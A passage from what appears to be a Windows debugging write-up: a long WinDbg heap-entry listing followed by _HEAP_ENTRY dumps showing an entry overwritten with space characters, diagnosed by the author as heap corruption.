        00a24180: 001b0 . 003a0 [01] - busy (397)
        00a24520: 003a0 . 001e0 [01] - busy (1d4)
        00a24700: 001e0 . 00200 [01] - busy (1f8)
        00a24900: 00200 . 00150 [01] - busy (146)
        00a24a50: 00150 . 00258 [01] - busy (250)
        00a24ca8: 00258 . 001e8 [01] - busy (1d9)
        00a24e90: 001e8 . 00258 [01] - busy (250)
        00a250e8: 00258 . 00158 [01] - busy (150)
        00a25240: 00158 . 001e0 [01] - busy (1d8)
        00a25420: 001e0 . 001e0 [01] - busy (1d8)
        00a25600: 001e0 . 00080 [01] - busy (78)
        00a25680: 00080 . 00070 [01] - busy (60)
        00a256f0: 00070 . 001e0 [01] - busy (1d8)
        00a258d0: 001e0 . 00608 [01] - busy (600)
        00a25ed8: 00608 . 00338 [01] - busy (330)
        00a26210: 00338 . 00188 [01] - busy (180)
        00a26398: 00188 . 00278 [01] - busy (26a)
        00a26610: 00278 . 001e0 [01] - busy (1d8)
        00a267f0: 001e0 . 00188 [01] - busy (180)
        00a26978: 00188 . 00178 [01] - busy (16c)
        00a26af0: 00178 . 002b8 [01] - busy (2ae)
        00a26da8: 002b8 . 00188 [01] - busy (180)
        00a26f30: 00188 . 001e0 [01] - busy (1d8)
        00a27110: 001e0 . 00188 [01] - busy (180)
        00a27298: 00188 . 00180 [01] - busy (174)
        00a27418: 00180 . 00178 [01] - busy (16c)
        00a27590: 00178 . 00168 [01] - busy (160)
        00a276f8: 00168 . 00178 [01] - busy (16c)
        00a27870: 00178 . 00170 [01] - busy (164)
        00a279e0: 00170 . 00180 [01] - busy (174)
        00a27b60: 00180 . 00168 [01] - busy (15c)
        00a27cc8: 00168 . 00168 [01] - busy (15c)
        00a27e30: 00168 . 00178 [01] - busy (16c)
        00a27fa8: 00178 . 00168 [01] - busy (160)
        00a28110: 00168 . 00118 [01] - busy (10c)
        00a28228: 00118 . 00130 [01] - busy (121)
        00a28358: 00130 . 001f8 [01] - busy (1eb)
        00a28550: 001f8 . 001c0 [01] - busy (1b2)
        00a28710: 001c0 . 00150 [01] - busy (144)
        00a28860: 00150 . 00188 [01] - busy (17d)
        00a289e8: 00188 . 00280 [01] - busy (278)
        00a28c68: 00280 . 002b0 [01] - busy (2a4)
        00a28f18: 002b0 . 00020 [01] - busy (18)
        00a28f38: 00020 . 000f0 [01] - busy (e8)
        00a29028: 000f0 . 001e0 [01] - busy (1d8)
        00a29208: 001e0 . 000c8 [01] - busy (c0)
        00a292d0: 000c8 . 00298 [01] - busy (290)
        00a29568: 00298 . 00178 [01] - busy (170)
        00a296e0: 00178 . 00608 [01] - busy (600)
        00a29ce8: 00608 . 001c0 [01] - busy (1b4)
        00a29ea8: 001c0 . 00110 [01] - busy (104)
        00a29fb8: 00110 . 00128 [01] - busy (11c)
        00a2a0e0: 00128 . 00140 [01] - busy (134)
        00a2a220: 00140 . 00020 [01] - busy (14)
        00a2a240: 00020 . 00608 [01] - busy (600)
        00a2a848: 00608 . 00170 [01] - busy (164)
        00a2a9b8: 00170 . 00138 [01] - busy (12c)
        00a2aaf0: 00138 . 00028 [01] - busy (20)
        00a2ab18: 00028 . 001e0 [01] - busy (1d8)
        00a2acf8: 001e0 . 00188 [01] - busy (180)
        00a2ae80: 00188 . 000c8 [01] - busy (c0)
        00a2af48: 000c8 . 00098 [00]
        00a2afe0: 00098 . 001e0 [01] - busy (1d8)
        00a2b1c0: 001e0 . 00188 [01] - busy (180)
        00a2b348: 00188 . 000c8 [01] - busy (c0)
        00a2b410: 000c8 . 00098 [01] - busy (8c)
        00a2b4a8: 00098 . 001e0 [01] - busy (1d8)
        00a2b688: 001e0 . 00188 [01] - busy (180)
        00a2b810: 00188 . 000c8 [01] - busy (c0)
        00a2b8d8: 000c8 . 00098 [01] - busy (88)
        00a2b970: 00098 . 001e0 [01] - busy (1d8)
        00a2bb50: 001e0 . 00188 [01] - busy (180)
        00a2bcd8: 00188 . 000c8 [01] - busy (c0)
        00a2bda0: 000c8 . 00098 [01] - busy (84)
        00a2be38: 00098 . 00188 [01] - busy (180)
        00a2bfc0: 00188 . 001e0 [01] - busy (1d8)
        00a2c1a0: 001e0 . 00308 [01] - busy (300)
        00a2c4a8: 00308 . 00178 [01] - busy (169)
        00a2c620: 00178 . 00168 [01] - busy (160)
        00a2c788: 00168 . 000c8 [01] - busy (c0)
        00a2c850: 000c8 . 00088 [01] - busy (80)
        00a2c8d8: 00088 . 00010 [01] - busy (4)
        00a2c8e8: 00010 . 001e0 [01] - busy (1d8)
        00a2cac8: 001e0 . 00188 [01] - busy (180)
        00a2cc50: 00188 . 00188 [01] - busy (180)
        00a2cdd8: 00188 . 00608 [01] - busy (600)
        00a2d3e0: 00608 . 001e0 [01] - busy (1d8)
        00a2d5c0: 001e0 . 00160 [01] - busy (158)
        00a2d720: 00160 . 00188 [01] - busy (180)
        00a2d8a8: 00188 . 001e0 [01] - busy (1d8)
        00a2da88: 001e0 . 00188 [01] - busy (180)
        00a2dc10: 00188 . 00160 [01] - busy (157)
        00a2dd70: 00160 . 001e0 [01] - busy (1d8)
        00a2df50: 001e0 . 00188 [01] - busy (180)
        00a2e0d8: 00188 . 00160 [01] - busy (158)
        00a2e238: 00160 . 001e0 [01] - busy (1d8)
        00a2e418: 001e0 . 00188 [01] - busy (180)
        00a2e5a0: 00188 . 00168 [01] - busy (15c)
        00a2e708: 00168 . 00188 [01] - busy (180)
        00a2e890: 00188 . 00178 [01] - busy (170)
        00a2ea08: 00178 . 00168 [01] - busy (160)
        00a2eb70: 00168 . 00188 [01] - busy (180)
        00a2ecf8: 00188 . 00608 [01] - busy (600)
        00a2f300: 00608 . 001b8 [01] - busy (1b0)
        00a2f4b8: 001b8 . 00168 [01] - busy (15c)
        00a2f620: 00168 . 00170 [01] - busy (164)
        00a2f790: 00170 . 00168 [01] - busy (15c)
        00a2f8f8: 00168 . 001d0 [01] - busy (1c7)
        00a2fac8: 001d0 . 00120 [01] - busy (113)
        00a2fbe8: 00120 . 00018 [01] - busy (10)
        00a2fc00: 00018 . 00268 [01] - busy (25c)
        00a2fe68: 00268 . 00128 [01] - busy (120)
        00a2ff90: 00128 . 00248 [01] - busy (240)
        00a301d8: 00248 . 00198 [01] - busy (18f)
        00a30370: 00198 . 00210 [01] - busy (204)
        00a30580: 00210 . 00048 [01] - busy (40)
        00a305c8: 00048 . 00350 [01] - busy (344)
        00a30918: 00350 . 00288 [01] - busy (27e)
        00a30ba0: 00288 . 00180 [01] - busy (176)
        00a30d20: 00180 . 00108 [01] - busy (100)
        00a30e28: 00108 . 00058 [01] - busy (48)
        00a30e80: 00058 . 00160 [01] - busy (158)
        00a30fe0: 00160 . 00030 [01] - busy (24)
        00a31010: 00030 . 00160 [01] - busy (158)
        00a31170: 00160 . 001e0 [01] - busy (1d8)
        00a31350: 001e0 . 00188 [01] - busy (180)
        00a314d8: 00188 . 001e0 [01] - busy (1d8)
        00a316b8: 001e0 . 00160 [01] - busy (154)
        00a31818: 00160 . 001e0 [01] - busy (1d8)
        00a319f8: 001e0 . 00188 [01] - busy (180)
        00a31b80: 00188 . 00160 [01] - busy (158)
        00a31ce0: 00160 . 001e0 [01] - busy (1d8)
        00a31ec0: 001e0 . 00608 [01] - busy (600)
        00a324c8: 00608 . 00190 [01] - busy (188)
        00a32658: 00190 . 00608 [01] - busy (600)
        00a32c60: 00608 . 00608 [01] - busy (600)
        00a33268: 00608 . 001e0 [01] - busy (1d8)
        00a33448: 001e0 . 001e0 [01] - busy (1d8)
        00a33628: 001e0 . 00170 [01] - busy (164)
        00a33798: 00170 . 00170 [01] - busy (164)
        00a33908: 00170 . 00170 [01] - busy (168)
        00a33a78: 00170 . 00170 [01] - busy (168)
        00a33be8: 00170 . 00168 [01] - busy (160)
        00a33d50: 00168 . 00170 [01] - busy (164)
        00a33ec0: 00170 . 00178 [01] - busy (16c)
        00a34038: 00178 . 00188 [01] - busy (180)
        00a341c0: 00188 . 00188 [01] - busy (180)
        00a34348: 00188 . 00188 [01] - busy (180)
        00a344d0: 00188 . 00188 [01] - busy (180)
        00a34658: 00188 . 00170 [01] - busy (164)
        00a347c8: 00170 . 00170 [01] - busy (168)
        00a34938: 00170 . 00168 [01] - busy (15c)
        00a34aa0: 00168 . 00170 [01] - busy (168)
        00a34c10: 00170 . 00160 [01] - busy (158)
        00a34d70: 00160 . 00260 [01] - busy (251)
        00a34fd0: 00260 . 00b60 [01] - busy (b53)
        00a35b30: 00b60 . 003b8 [01] - busy (3ad)
        00a35ee8: 003b8 . 000c8 [01] - busy (c0)
        00a35fb0: 000c8 . 00198 [01] - busy (190)
        00a36148: 00198 . 001f8 [01] - busy (1ec)
        00a36340: 001f8 . 00168 [01] - busy (160)
        00a364a8: 00168 . 00170 [01] - busy (168)
        00a36618: 00170 . 001d0 [01] - busy (1c4)
        00a367e8: 001d0 . 00198 [01] - busy (190)
        00a36980: 00198 . 001b8 [01] - busy (1b0)
        00a36b38: 001b8 . 00168 [01] - busy (15c)
        00a36ca0: 00168 . 00178 [01] - busy (16c)
        00a36e18: 00178 . 00170 [01] - busy (164)
        00a36f88: 00170 . 00180 [01] - busy (174)
        00a37108: 00180 . 00178 [01] - busy (170)
        00a37280: 00178 . 00180 [01] - busy (178)
        00a37400: 00180 . 00178 [01] - busy (16c)
        00a37578: 00178 . 00170 [01] - busy (164)
        00a376e8: 00170 . 00168 [01] - busy (15c)
        00a37850: 00168 . 00188 [01] - busy (17c)
        00a379d8: 00188 . 00170 [01] - busy (164)
        00a37b48: 00170 . 00190 [01] - busy (184)
        00a37cd8: 00190 . 00160 [01] - busy (158)
        00a37e38: 00160 . 003a0 [01] - busy (398)
        00a381d8: 003a0 . 002b0 [01] - busy (2a4)
        00a38488: 002b0 . 002a8 [01] - busy (29c)
        00a38730: 002a8 . 002a8 [01] - busy (29c)
        00a389d8: 002a8 . 00248 [01] - busy (23c)
        00a38c20: 00248 . 00248 [01] - busy (23c)
        00a38e68: 00248 . 00138 [01] - busy (12c)
        00a38fa0: 00138 . 00048 [01] - busy (3a)
        00a38fe8: 00048 . 00018 [00]
        00a39000: 00018 . 00178 [01] - busy (16f)
        00a39178: 00178 . 00188 [01] - busy (180)
        00a39300: 00188 . 00110 [01] - busy (108)
        00a39410: 00110 . 00188 [01] - busy (180)
        00a39598: 00188 . 00138 [01] - busy (12d)
        00a396d0: 00138 . 00180 [01] - busy (174)
        00a39850: 00180 . 00010 [01] - busy (4)
        00a39860: 00010 . 00010 [01] - busy (4)
        00a39870: 00010 . 00168 [01] - busy (15c)
        00a399d8: 00168 . 18008 [01] - busy (18000)
        00a519e0: 18008 . 002c0 [01] - busy (2b4)
        00a51ca0: 002c0 . 00368 [01] - busy (35d)
        00a52008: 00368 . 00198 [01] - busy (18e)
        00a521a0: 00198 . 00330 [01] - busy (324)
        00a524d0: 00330 . 00488 [01] - busy (47c)
        00a52958: 00488 . 003c8 [01] - busy (3c0)
        00a52d20: 003c8 . 00608 [01] - busy (600)
        00a53328: 00608 . 001d8 [01] - busy (1c9)
        00a53500: 001d8 . 00188 [01] - busy (180)
        00a53688: 00188 . 001e0 [01] - busy (1d8)
        00a53868: 001e0 . 00108 [01] - busy (100)
        00a53970: 00108 . 00108 [01] - busy (100)
        00a53a78: 00108 . 00108 [01] - busy (100)
        00a53b80: 00108 . 00160 [01] - busy (158)
        00a53ce0: 00160 . 00190 [01] - busy (180)
        00a53e70: 00190 . 00178 [01] - busy (16c)
        00a53fe8: 00178 . 00188 [01] - busy (180)
        00a54170: 00188 . 00180 [01] - busy (174)
        00a542f0: 00180 . 00028 [01] - busy (20)
        00a54318: 00028 . 00018 [01] - busy (10)
        00a54330: 00018 . 01300 [01] - busy (12f7)
        00a55630: 01300 . 00818 [01] - busy (809)
        00a55e48: 00818 . 001b0 [01] - busy (1a8)
        00a55ff8: 001b0 . 00288 [01] - busy (27b)
        00a56280: 00288 . 00488 [01] - busy (47e)
        00a56708: 00488 . 00188 [01] - busy (180)
        00a56890: 00188 . 00188 [01] - busy (180)
        00a56a18: 00188 . 00188 [01] - busy (180)
        00a56ba0: 00188 . 00188 [01] - busy (180)
        00a56d28: 00188 . 00188 [01] - busy (17c)
        00a56eb0: 00188 . 00128 [01] - busy (120)
        00a56fd8: 00128 . 00010 [01] - busy (8)
        00a56fe8: 00010 . 001b8 [01] - busy (1b0)
        00a571a0: 001b8 . 00188 [01] - busy (180)
        00a57328: 00188 . 00188 [01] - busy (180)
        00a574b0: 00188 . 00608 [01] - busy (600)
        00a57ab8: 00608 . 00170 [01] - busy (161)
        00a57c28: 00170 . 001e0 [01] - busy (1d8)
        00a57e08: 001e0 . 00188 [01] - busy (180)
        00a57f90: 00188 . 00048 [01] - busy (40)
        00a57fd8: 00048 . 00018 [00]
        00a57ff0: 00018 . 003e8 [01] - busy (3dc)
        00a583d8: 003e8 . 00188 [01] - busy (17c)
        00a58560: 00188 . 00450 [01] - busy (441)
        00a589b0: 00450 . 000c8 [01] - busy (c0)
        00a58a78: 000c8 . 00010 [01] - busy (8)
        00a58a88: 00010 . 00010 [01] - busy (4)
        00a58a98: 00010 . 003e8 [01] - busy (3dc)
        00a58e80: 003e8 . 00120 [01] - busy (114)
        00a58fa0: 00120 . 00010 [01] - busy (8)
        00a58fb0: 00010 . 00040 [00]
        00a58ff0: 00040 . 00170 [01] - busy (164)
        00a59160: 00170 . 00288 [01] - busy (280)
        00a593e8: 00288 . 00188 [01] - busy (180)
        00a59570: 00188 . 00168 [01] - busy (15c)
        00a596d8: 00168 . 00170 [01] - busy (164)
        00a59848: 00170 . 001e0 [01] - busy (1d8)
        00a59a28: 001e0 . 00050 [01] - busy (40)
        00a59a78: 00050 . 00190 [01] - busy (188)
        00a59c08: 00190 . 00190 [01] - busy (185)
        00a59d98: 00190 . 00178 [01] - busy (16c)
        00a59f10: 00178 . 00170 [01] - busy (168)
        00a5a080: 00170 . 00160 [01] - busy (154)
        00a5a1e0: 00160 . 00178 [01] - busy (170)
        00a5a358: 00178 . 003e8 [01] - busy (3dc)
        00a5a740: 003e8 . 001d0 [01] - busy (1c7)
        00a5a910: 001d0 . 00160 [01] - busy (157)
        00a5aa70: 00160 . 001b0 [01] - busy (1a8)
        00a5ac20: 001b0 . 00188 [01] - busy (17e)
        00a5ada8: 00188 . 00210 [01] - busy (202)
        00a5afb8: 00210 . 00050 [01] - busy (40)
        00a5b008: 00050 . 00240 [01] - busy (238)
        00a5b248: 00240 . 002a8 [01] - busy (29c)
        00a5b4f0: 002a8 . 00248 [01] - busy (23c)
        00a5b738: 00248 . 00278 [01] - busy (270)
        00a5b9b0: 00278 . 002a8 [01] - busy (29c)
        00a5bc58: 002a8 . 00278 [01] - busy (270)
        00a5bed0: 00278 . 00248 [01] - busy (23c)
        00a5c118: 00248 . 00278 [01] - busy (270)
        00a5c390: 00278 . 00278 [01] - busy (270)
        00a5c608: 00278 . 00248 [01] - busy (23c)
        00a5c850: 00248 . 00248 [01] - busy (23c)
        00a5ca98: 00248 . 00248 [01] - busy (23c)
        00a5cce0: 00248 . 00248 [01] - busy (23c)
        00a5cf28: 00248 . 00248 [01] - busy (23c)
        00a5d170: 00248 . 00248 [01] - busy (23c)
        00a5d3b8: 00248 . 001a0 [01] - busy (194)
        00a5d558: 001a0 . 00248 [01] - busy (23c)
        00a5d7a0: 00248 . 00248 [01] - busy (23c)
        00a5d9e8: 00248 . 00248 [01] - busy (23c)
        00a5dc30: 00248 . 00248 [01] - busy (23c)
        00a5de78: 00248 . 00248 [01] - busy (23c)
        00a5e0c0: 00248 . 00248 [01] - busy (23c)
        00a5e308: 00248 . 00248 [01] - busy (23c)
        00a5e550: 00248 . 00248 [01] - busy (23c)
        00a5e798: 00248 . 00248 [01] - busy (23c)
        00a5e9e0: 00248 . 00248 [01] - busy (23c)
        00a5ec28: 00248 . 002a8 [01] - busy (29c)
        00a5eed0: 002a8 . 002a8 [01] - busy (29c)
        00a5f178: 002a8 . 00248 [01] - busy (23c)
        00a5f3c0: 00248 . 002a8 [01] - busy (29c)
        00a5f668: 002a8 . 002a8 [01] - busy (29c)
        00a5f910: 002a8 . 00248 [01] - busy (23c)
        00a5fb58: 00248 . 00248 [01] - busy (23c)
        00a5fda0: 00248 . 002a8 [01] - busy (29c)
        00a60048: 002a8 . 002a8 [01] - busy (29c)
        00a602f0: 002a8 . 002a8 [01] - busy (29c)
        00a60598: 002a8 . 002a8 [01] - busy (29c)
        00a60840: 002a8 . 002a8 [01] - busy (29c)
        00a60ae8: 002a8 . 002a8 [01] - busy (29c)
        00a60d90: 002a8 . 00248 [01] - busy (23c)
        00a60fd8: 00248 . 002a8 [01] - busy (29c)
        00a61280: 002a8 . 00248 [01] - busy (23c)
        00a614c8: 00248 . 00248 [01] - busy (23c)
        00a61710: 00248 . 00248 [01] - busy (23c)
        00a61958: 00248 . 00248 [01] - busy (23c)
        00a61ba0: 00248 . 002a8 [01] - busy (29c)
        00a61e48: 002a8 . 00280 [01] - busy (278)
        00a620c8: 00280 . 00280 [01] - busy (278)
        00a62348: 00280 . 00248 [01] - busy (23c)
        00a62590: 00248 . 00248 [01] - busy (23c)
        00a627d8: 00248 . 00248 [01] - busy (23c)
        00a62a20: 00248 . 00248 [01] - busy (23c)
        00a62c68: 00248 . 00248 [01] - busy (23c)
        00a62eb0: 00248 . 00248 [01] - busy (23c)
        00a630f8: 00248 . 00248 [01] - busy (23c)
        00a63340: 00248 . 00248 [01] - busy (23c)
        00a63588: 00248 . 00248 [01] - busy (23c)
        00a637d0: 00248 . 00248 [01] - busy (23c)
        00a63a18: 00248 . 00248 [01] - busy (23c)
        00a63c60: 00248 . 00248 [01] - busy (23c)
        00a63ea8: 00248 . 00248 [01] - busy (23c)
        00a640f0: 00248 . 00248 [01] - busy (23c)
        00a64338: 00248 . 00248 [01] - busy (23c)
        00a64580: 00248 . 00248 [01] - busy (23c)
        00a647c8: 00248 . 00248 [01] - busy (23c)
        00a64a10: 00248 . 00248 [01] - busy (23c)
        00a64c58: 00248 . 00248 [01] - busy (23c)
        00a64ea0: 00248 . 001c8 [01] - busy (1bc)
        00a65068: 001c8 . 00248 [01] - busy (23c)
        00a652b0: 00248 . 00248 [01] - busy (23c)
        00a654f8: 00248 . 00248 [01] - busy (23c)
        00a65740: 00248 . 00220 [01] - busy (218)
        00a65960: 00220 . 00248 [01] - busy (23c)
        00a65ba8: 00248 . 00248 [01] - busy (23c)
        00a65df0: 00248 . 00278 [01] - busy (270)
        00a66068: 00278 . 00248 [01] - busy (23c)
        00a662b0: 00248 . 00248 [01] - busy (23c)
        00a664f8: 00248 . 00248 [01] - busy (23c)
        00a66740: 00248 . 00248 [01] - busy (23c)
        00a66988: 00248 . 00118 [01] - busy (110)
        00a66aa0: 00118 . 00248 [01] - busy (23c)
        00a66ce8: 00248 . 00248 [01] - busy (23c)
        00a66f30: 00248 . 00118 [01] - busy (110)
        00a67048: 00118 . 00248 [01] - busy (23c)
        00a67290: 00248 . 00248 [01] - busy (23c)
        00a674d8: 00248 . 00220 [01] - busy (218)
        00a676f8: 00220 . 00248 [01] - busy (23c)
        00a67940: 00248 . 00248 [01] - busy (23c)
        00a67b88: 00248 . 00248 [01] - busy (23c)
        00a67dd0: 00248 . 00248 [01] - busy (23c)
        00a68018: 00248 . 00248 [01] - busy (23c)
        00a68260: 00248 . 00248 [01] - busy (23c)
        00a684a8: 00248 . 00248 [01] - busy (23c)
        00a686f0: 00248 . 00248 [01] - busy (23c)
        00a68938: 00248 . 00248 [01] - busy (23c)
        00a68b80: 00248 . 00248 [01] - busy (23c)
        00a68dc8: 00248 . 00248 [01] - busy (23c)
        00a69010: 00248 . 00248 [01] - busy (23c)
        00a69258: 00248 . 00130 [01] - busy (128)
        00a69388: 00130 . 00248 [01] - busy (23c)
        00a695d0: 00248 . 00248 [01] - busy (23c)
        00a69818: 00248 . 00118 [01] - busy (110)
        00a69930: 00118 . 00248 [01] - busy (23c)
        00a69b78: 00248 . 00248 [01] - busy (23c)
        00a69dc0: 00248 . 00248 [01] - busy (23c)
        00a6a008: 00248 . 002a8 [01] - busy (29c)
        00a6a2b0: 002a8 . 00248 [01] - busy (23c)
        00a6a4f8: 00248 . 00248 [01] - busy (23c)
        00a6a740: 00248 . 00248 [01] - busy (23c)
        00a6a988: 00248 . 00248 [01] - busy (23c)
        00a6abd0: 00248 . 00248 [01] - busy (23c)
        00a6ae18: 00248 . 00248 [01] - busy (23c)
        00a6b060: 00248 . 00120 [01] - busy (118)
        00a6b180: 00120 . 00248 [01] - busy (23c)
        00a6b3c8: 00248 . 00248 [01] - busy (23c)
        00a6b610: 00248 . 00248 [01] - busy (23c)
        00a6b858: 00248 . 00248 [01] - busy (23c)
        00a6baa0: 00248 . 00248 [01] - busy (23c)
        00a6bce8: 00248 . 00248 [01] - busy (23c)
        00a6bf30: 00248 . 00248 [01] - busy (23c)
        00a6c178: 00248 . 00248 [01] - busy (23c)
        00a6c3c0: 00248 . 00248 [01] - busy (23c)
        00a6c608: 00248 . 00148 [01] - busy (140)
        00a6c750: 00148 . 00160 [01] - busy (158)
        00a6c8b0: 00160 . 02018 [01] - busy (2010)
        00a6e8c8: 02018 . 01008 [01] - busy (1000)
        00a6f8d0: 01008 . 00ad8 [00]
        00a703a8: 00ad8 . 00120 [01] - busy (115)
        00a704c8: 00120 . 00358 [01] - busy (34d)
        00a70820: 00358 . 00188 [01] - busy (180)
        00a709a8: 00188 . 00110 [01] - busy (104)
        00a70ab8: 00110 . 00050 [01] - busy (40)
        00a70b08: 00050 . 00358 [01] - busy (34c)
        00a70e60: 00358 . 00168 [01] - busy (160)
        00a70fc8: 00168 . 00118 [01] - busy (109)
        00a710e0: 00118 . 001c8 [01] - busy (1c0)
        00a712a8: 001c8 . 00168 [01] - busy (160)
        00a71410: 00168 . 00210 [01] - busy (202)
        00a71620: 00210 . 001e0 [01] - busy (1d8)
        00a71800: 001e0 . 00188 [01] - busy (180)
        00a71988: 00188 . 000f8 [00]
        00a71a80: 000f8 . 01808 [01] - busy (1800)
        00a73288: 01808 . 01808 [01] - busy (1800)
        00a74a90: 01808 . 01808 [01] - busy (1800)
        00a76298: 01808 . 00188 [01] - busy (180)
        00a76420: 00188 . 00188 [01] - busy (180)
        00a765a8: 00188 . 001e0 [01] - busy (1d8)
        00a76788: 001e0 . 00308 [01] - busy (300)
        00a76a90: 00308 . 00608 [01] - busy (600)
        00a77098: 00608 . 00180 [01] - busy (178)
        00a77218: 00180 . 00168 [01] - busy (160)
        00a77380: 00168 . 00180 [01] - busy (178)
        00a77500: 00180 . 00168 [01] - busy (15c)
        00a77668: 00168 . 00198 [01] - busy (190)
        00a77800: 00198 . 001f8 [01] - busy (1ec)
        00a779f8: 001f8 . 00188 [01] - busy (17c)
        00a77b80: 00188 . 00170 [01] - busy (164)
        00a77cf0: 00170 . 00170 [01] - busy (168)
        00a77e60: 00170 . 00178 [01] - busy (170)
        00a77fd8: 00178 . 00198 [01] - busy (18c)
        00a78170: 00198 . 001f8 [01] - busy (1ec)
        00a78368: 001f8 . 00170 [01] - busy (164)
        00a784d8: 00170 . 00170 [01] - busy (164)
        00a78648: 00170 . 00168 [01] - busy (15c)
        00a787b0: 00168 . 001b8 [01] - busy (1b0)
        00a78968: 001b8 . 00180 [01] - busy (174)
        00a78ae8: 00180 . 00188 [01] - busy (180)
        00a78c70: 00188 . 00100 [00]
        00a78d70: 00100 . 00180 [01] - busy (174)
        00a78ef0: 00180 . 00608 [01] - busy (600)
        00a794f8: 00608 . 00208 [01] - busy (200)
        00a79700: 00208 . 00188 [01] - busy (180)
        00a79888: 00188 . 00608 [01] - busy (600)
        00a79e90: 00608 . 00308 [01] - busy (300)
        00a7a198: 00308 . 00220 [01] - busy (214)
        00a7a3b8: 00220 . 003f8 [00]
        00a7a7b0: 003f8 . 003d0 [01] - busy (3c2)
        00a7ab80: 003d0 . 00248 [01] - busy (240)
        00a7adc8: 00248 . 00318 [01] - busy (30f)
        00a7b0e0: 00318 . 00228 [01] - busy (21e)
        00a7b308: 00228 . 00378 [01] - busy (370)
        00a7b680: 00378 . 00168 [01] - busy (160)
        00a7b7e8: 00168 . 00278 [01] - busy (270)
        00a7ba60: 00278 . 001e0 [01] - busy (1d8)
        00a7bc40: 001e0 . 00520 [01] - busy (518)
        00a7c160: 00520 . 00268 [01] - busy (25e)
        00a7c3c8: 00268 . 00178 [01] - busy (16f)
        00a7c540: 00178 . 00120 [01] - busy (116)
        00a7c660: 00120 . 00170 [01] - busy (167)
        00a7c7d0: 00170 . 00268 [01] - busy (25a)
        00a7ca38: 00268 . 003d8 [01] - busy (3cf)
        00a7ce10: 003d8 . 004d0 [01] - busy (4c2)
        00a7d2e0: 004d0 . 00408 [01] - busy (3fa)
        00a7d6e8: 00408 . 00118 [01] - busy (10c)
        00a7d800: 00118 . 00118 [01] - busy (10c)
        00a7d918: 00118 . 001a0 [01] - busy (197)
        00a7dab8: 001a0 . 00118 [01] - busy (10c)
        00a7dbd0: 00118 . 00608 [01] - busy (600)
        00a7e1d8: 00608 . 001e0 [01] - busy (1d8)
        00a7e3b8: 001e0 . 00188 [01] - busy (17b)
        00a7e540: 00188 . 00228 [01] - busy (21b)
        00a7e768: 00228 . 00068 [01] - busy (5c)
        00a7e7d0: 00068 . 00010 [01] - busy (4)
        00a7e7e0: 00010 . 00160 [01] - busy (154)
        00a7e940: 00160 . 00188 [01] - busy (180)
        00a7eac8: 00188 . 00160 [01] - busy (158)
        00a7ec28: 00160 . 00188 [01] - busy (180)
        00a7edb0: 00188 . 00160 [01] - busy (154)
        00a7ef10: 00160 . 00188 [01] - busy (180)
        00a7f098: 00188 . 00c08 [01] - busy (c00)
        00a7fca0: 00c08 . 001a8 [01] - busy (1a0)
        00a7fe48: 001a8 . 00188 [01] - busy (180)
        00a7ffd0: 00188 . 00018 [01] - busy (c)
        00a7ffe8: 00018 . 00018 [11] - busy (c)
    Segment02 at 00a80000:
        Flags:           00000000
        Base:            00a80000
        First Entry:     00a80040
        Last Entry:      00c80000
        Total Pages:     00000200
        Total UnCommit:  00000175
        Largest UnCommit:00172000
        UnCommitted Ranges: (2)
            00acb000: 00003000
            00b0e000: 00172000

    Heap entries for Segment02 in Heap 00970000
        00a80000: 00000 . 00040 [01] - busy (40)
        00a80040: 00040 . 40008 [01] - busy (40000)
        00ac0048: 40008 . 00170 [01] - busy (164)
        00ac01b8: 00170 . 01808 [01] - busy (1800)
        00ac19c0: 01808 . 00408 [01] - busy (400)
        00ac1dc8: 00408 . 000c8 [01] - busy (c0)
        00ac1e90: 000c8 . 000c8 [01] - busy (c0)
        00ac1f58: 000c8 . 000a8 [01] - busy (93)
        00ac2000: 000a8 . 03008 [01] - busy (3000)
        00ac5008: 03008 . 00460 [01] - busy (453)
        00ac5468: 00460 . 00190 [01] - busy (188)
        00ac55f8: 00190 . 00188 [01] - busy (180)
        00ac5780: 00188 . 00170 [01] - busy (164)
        00ac58f0: 00170 . 00170 [01] - busy (164)
        00ac5a60: 00170 . 000d0 [00]
        00ac5b30: 000d0 . 001a0 [01] - busy (196)
        00ac5cd0: 001a0 . 001e0 [01] - busy (1d8)
        00ac5eb0: 001e0 . 05150 [10]
        00acb000:      00003000      - uncommitted bytes.
        00ace000: 00000 . 00018 [01] - busy (10)
        00ace018: 00018 . 00018 [01] - busy (10)
        00ace030: 00018 . 00198 [01] - busy (18f)
        00ace1c8: 00198 . 001e8 [01] - busy (1d9)
        00ace3b0: 001e8 . 00118 [01] - busy (10f)
        00ace4c8: 00118 . 003f8 [01] - busy (3eb)
        00ace8c0: 003f8 . 00168 [01] - busy (15a)
        00acea28: 00168 . 003e8 [01] - busy (3dc)
        00acee10: 003e8 . 001e0 [01] - busy (1d7)
        00aceff0: 001e0 . 00130 [01] - busy (128)
        00acf120: 00130 . 00030 [00]
        00acf150: 00030 . 001e0 [01] - busy (1d8)
        00acf330: 001e0 . 00160 [01] - busy (154)
        00acf490: 00160 . 001e0 [01] - busy (1d8)
        00acf670: 001e0 . 00160 [01] - busy (154)
        00acf7d0: 00160 . 001e0 [01] - busy (1d8)
        00acf9b0: 001e0 . 000c8 [01] - busy (c0)
        00acfa78: 000c8 . 00160 [01] - busy (158)
        00acfbd8: 00160 . 001e0 [01] - busy (1d8)
        00acfdb8: 001e0 . 00188 [01] - busy (180)
        00acff40: 00188 . 0c008 [01] - busy (c000)
        00adbf48: 0c008 . 20020 [01] - busy (20015)
        00afbf68: 20020 . 10020 [01] - busy (10015)
        00b0bf88: 10100 . 10100 [20]
            unable to read heap entry at 00b1c088

The error message shown by windbg "unable to read heap entry at.." partially confirms that its a sign of memory / heap corruption. 

0:000> dt _HEAP_ENTRY 00adbf48
ntdll!_HEAP_ENTRY
   +0x000 Size             : 0x4004
   +0x002 PreviousSize     : 0x1801
   +0x000 SubSegmentCode   : 0x18014004 
   +0x004 SmallTagIndex    : 0xc3 ''
   +0x005 Flags            : 0x1 ''
   +0x006 UnusedBytes      : 0xb ''
   +0x007 SegmentIndex     : 0x2 ''

			
0:000> dt _HEAP_ENTRY 00afbf68
ntdll!_HEAP_ENTRY
   +0x000 Size             : 0x2004
   +0x002 PreviousSize     : 0x4004
   +0x000 SubSegmentCode   : 0x40042004 
   +0x004 SmallTagIndex    : 0xc7 ''
   +0x005 Flags            : 0x1 ''
   +0x006 UnusedBytes      : 0xb ''
   +0x007 SegmentIndex     : 0x2 ''

Above two entries actually make sense. size and previous size matches for both of them. Now lets dessect the last entry

0:000> dt _HEAP_ENTRY 00b0bf88
ntdll!_HEAP_ENTRY
   +0x000 Size             : 0x2020
   +0x002 PreviousSize     : 0x2020
   +0x000 SubSegmentCode   : 0x20202020 
   +0x004 SmallTagIndex    : 0x20 ' '
